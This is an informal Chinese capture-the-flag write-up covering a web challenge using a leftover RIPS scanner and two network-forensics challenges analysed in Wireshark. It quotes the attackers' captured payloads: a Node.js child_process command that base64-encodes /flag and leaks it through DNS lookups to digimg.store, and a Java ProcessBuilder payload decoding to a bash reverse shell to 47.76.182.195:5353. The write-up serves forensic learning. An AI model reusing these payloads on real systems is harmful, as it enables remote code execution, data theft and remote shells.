太好了又水一集挺难的不过好在还是有签到题代码中的秘密misc但是靶机不过是签到查看robots.txt 中发现了 clue。 提示网站可能存在 RIPS 扫描器的遗留文件。访问 /rips/ 路径后利用 RIPS 扫描器的功能对服务器 web 根目录/var/www/进行扫描从扫描结果的文件列表中发现了一个异常文件 a6e97102-1f98-4c21-a6e1-26611c53b79b.php。访问获得 flag。flag{a6e97102-1f98-4c21-a6e1-26611c53b79b}静影寻踪取证描述于凝固的数字记忆中追溯那些悄然消逝的涟漪与未言之约。咱也不懂FLAG 消失之谜取证那我问你描述我们刚刚监测到一次针对 Web 服务器的精准攻击——攻击者利用漏洞成功窃取了服务器上的敏感文件FLAG。 幸运的是我们捕获了攻击期间的完整网络流量但 FLAG 已被攻击者通过某种方式隐藏并外传。核心逻辑Web 漏洞利用 (RCE) - 数据编码 (Base64) - 通道外带 (DNS OOB)。1. 攻击流量发现首先分析 HTTP 流量寻找攻击入口。通过搜索 POST 请求或 exec、system 等关键字定位到第 9780 帧附近的恶意请求。Payload 分析攻击者发送了一个 JSON 数据包其中利用了 Node.js 的 child_process 模块执行系统命令。process.mainModule.require(child_process).execSync(cat /flag | base64 | tr -d | tr -d \\n | xargs -I {} ping -c 1 {}.c07545bc.digimg.store)行为判定这是一次利用 Node.js 环境进行的远程代码执行RCE并利用 DNS 协议进行数据外带。2. 数据提取 (DNS Exfiltration)攻击者将 /flag 的内容进行了 Base64 编码并移除了填充符 和换行符然后将其拼接到 digimg.store 的子域名中进行 ping 操作。这会导致受害服务器向 DNS 服务器发送查询请求。过滤 DNS在 Wireshark 中使用过滤器 dns 或直接搜索域名 digimg.store。提取数据找到 DNS Query Name 字段提取主机名前缀ZmxhZ3tiOGVmYjJjYS02M2U4LTRkYjYtYWVhNS02YzZkMzRmMDM3NTR3. Flag 还原对提取的字符串进行 Base64 解码Base64: ZmxhZ3tiOGVmYjJjYS02M2U4LTRkYjYtYWVhNS02YzZkMzRmMDM3NTRASCII: flag{b8efb2ca-63e8-4db6-aea5-6c6d34f03754由于 Base64 编码在传输过程中可能丢失了最后的 fQ (即 }) 部分或者被截断根据 UUID 的标准格式8-4-4-4-12验证Guid 部分 b8efb2ca-63e8-4db6-aea5-6c6d34f03754 是完整的。因此只需补上最后的 }。一发入魂取证。懒得搞了反正也没奖描述这位黑客老哥属实是个讲究人全程只发一个 HTTP 包深藏功与名。快来围观这“一发入魂”的骚操作顺便把 FLAG 领走flag{4ba8aa22-6703-4107-9a68-9f3c92cccd24}1. 初步分析拿到流量包题目提示“黑客全程只发一个 HTTP 包”这暗示我们可以通过过滤 HTTP POST 请求来快速定位攻击入口。在 Wireshark 中使用过滤器http.request.method POST2. 发现攻击流量筛选后发现唯一的 POST 请求是发往/ScriptEngine/scriptEngineEval.do的。这是一个典型的命令执行漏洞利用特征。查看该数据包的实体内容URL解码后var pb new java.lang.ProcessBuilder(bash, -c, {echo,YmFzaCAtaSAJiAvZGV2L3RjcC80Ny43Ni4xODIuMTk1LzUzNTMgMD4mMQ}|{base64,-d}|{bash,-i}); pb.redirectErrorStream(true); var p pb.start(); ...这段 Payload 利用 Java 的ProcessBuilder执行了一段 Base64 编码的 shell 命令。3. 解码攻击载荷提取其中的 Base64 字符串YmFzaCAtaSAJiAvZGV2L3RjcC80Ny43Ni4xODIuMTk1LzUzNTMgMD4mMQ进行解码内容为bash -i /dev/tcp/47.76.182.195/5353 01这证实攻击者成功向47.76.182.195:5353建立了一个反弹 Shell。4. 追踪 TCP 流既然攻击者已经拿到了 Shell后续的读取 Flag 操作肯定是在这个反弹连接TCP流中进行的。在 Wireshark 中找到目标端口为5353的数据包。右键点击相关条目 -Follow-TCP Stream。在 TCP 流的数据中通常在流的末尾可以看到攻击者执行了如下命令echo aGV4ZHVtcCAtdmUgJzEvMSAiJS4yeCInIC9mbGFn | base64 -d | bash将这段 Base64 解码发现攻击者执行的是hexdump -ve 1/1 %.2x /flag这意味着/flag文件的内容被转换成了十六进制纯文本进行回显。5. 获取 FLAG在 TCP 流的响应中找到对应的十六进制输出666c61677b34626138616132322d363730332d343130372d396136382d3966336339326363636432347d将其从 Hex 转换为 ASCII 字符串flag{4ba8aa22-6703-4107-9a68-9f3c92cccd24}咕咕嘎嘎呃~